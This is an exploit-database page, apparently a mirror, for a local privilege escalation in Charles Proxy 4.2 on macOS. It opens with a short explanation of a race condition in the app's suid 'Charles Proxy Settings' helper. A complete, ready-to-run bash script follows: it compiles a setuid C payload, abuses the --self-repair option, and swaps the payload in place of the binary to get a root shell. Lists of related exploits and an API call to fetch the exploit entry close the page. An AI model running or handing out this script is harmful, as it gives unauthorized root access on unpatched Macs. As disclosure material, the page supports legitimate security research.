Menu

Search for hundreds of thousands of exploits

"Charles Proxy 4.2 - Local Privilege Escalation"

Author

"Mark Wadham"

Platform

macos

Release date

2018-07-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.

In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.

Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:

/Applications/Charles.app/Contents/Resources/Charles Proxy Settings

Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.

It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.

This issue was fixed in Charles 4.2.1 released in November 2017.

https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash

####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################

cd
user="`whoami`"

cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
  return 0;
}
EOF

gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
  echo "failed to compile the exploit, you need xcode cli tools for this."
  exit 1
fi
rm -f charles_exploit.c

ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings

i=0

while :
do
  r=`ls -la Charles\ Proxy\ Settings |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
  i=$((i+1))
  if [ $i -eq 10 ] ; then
    rm -f Charles\ Proxy\ Settings
    echo "Not vulnerable"
    exit 1
  fi
done

./Charles\ Proxy\ Settings
Release Date Title Type Platform Author
2019-08-05 "macOS iMessage - Heap Overflow when Deserializing" dos macos "Google Security Research"
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-03-01 "macOS XNU - Copy-on-Write Behavior Bypass via Mount of User-Owned Filesystem Image" dos macos "Google Security Research"
2019-02-13 "Apple macOS 10.13.5 - Local Privilege Escalation" local macos Synacktiv
2019-02-20 "FaceTime - Texture Processing Memory Corruption" dos macos "Google Security Research"
2019-01-31 "macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File" dos macos "Google Security Research"
2019-01-24 "Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)" dos macos "Saeed Hasanzadeh"
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-13 "CuteFTP Mac 3.1 - Denial of Service (PoC)" dos macos "Yair Rodríguez Aparicio"
2018-11-06 "FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption" dos macos "Google Security Research"
2018-11-06 "FaceTime - 'readSPSandGetDecoderParams' Stack Corruption" dos macos "Google Security Research"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
2018-05-30 "Yosoro 1.0.4 - Remote Code Execution" webapps macos "Carlo Pelliccioni"
2017-02-24 "Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting" webapps macos "Google Security Research"
2017-06-06 "Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution" remote macos saelo
2017-05-04 "Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free" remote macos "saelo & niklasb"
2017-02-23 "Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read" remote macos "Google Security Research"
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-03-20 "Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation" local macos "Google Security Research"
2017-01-16 "Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation" local macos "Brandon Azad"
2017-12-07 "Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak" local macos "Brandon Azad"
2017-11-28 "Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation" local macos Lemiorhan
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
Release Date Title Type Platform Author
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Sera 1.2 - Local Privilege Escalation / Password Disclosure" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.6 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Murus 1.4.11 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.7 - Local Privilege Escalation" local macos "Mark Wadham"
2017-07-18 "Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation" local macos "Mark Wadham"
2017-04-11 "Proxifier for Mac 2.17/2.18 - Privesc Escalation" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (2)" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (1)" local macos "Mark Wadham"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45107/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/45107/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45107/9990/charles-proxy-42-local-privilege-escalation/download/", "exploit_id": "45107", "exploit_description": "\"Charles Proxy 4.2 - Local Privilege Escalation\"", "exploit_date": "2018-07-30", "exploit_author": "\"Mark Wadham\"", "exploit_type": "local", "exploit_platform": "macos", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse